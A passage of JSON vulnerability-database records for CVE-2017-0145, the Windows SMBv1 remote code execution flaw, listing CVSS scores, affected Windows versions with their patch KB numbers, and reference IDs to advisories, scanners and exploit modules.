"PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB4014077", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for 
x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", 
"kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", 
"msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\n[Note: the CVSS v2 and v3 vectors recorded on this entry (Au:N, PR:N) state that no authentication is required, so the 'authenticated attacker' wording above should not be read as a mitigating factor; any SMBv1 server reachable over SMB/NBT should be treated as exposed until the update listed for its platform is applied.]\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T10:55:46", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": 
"metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3213986", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KB3212646", "KB4014077", "KB4012212", "KB4012214", "KB3205401", "KB4013429", "KB4012215", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": 
"Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit 
Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:55:46", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2017-0145", 
"hash": "32dd1c2d5f94ad64bc33322ba051cb15", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\n[Note: the CVSS v2 and v3 vectors recorded on this entry (Au:N, PR:N) state that no authentication is required, so the 'authenticated attacker' wording above should not be read as a mitigating factor; any SMBv1 server reachable over SMB/NBT should be treated as exposed until the update listed for its platform is applied.]\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T12:46:46", "history": [], "viewCount": 46, "enchantments": 
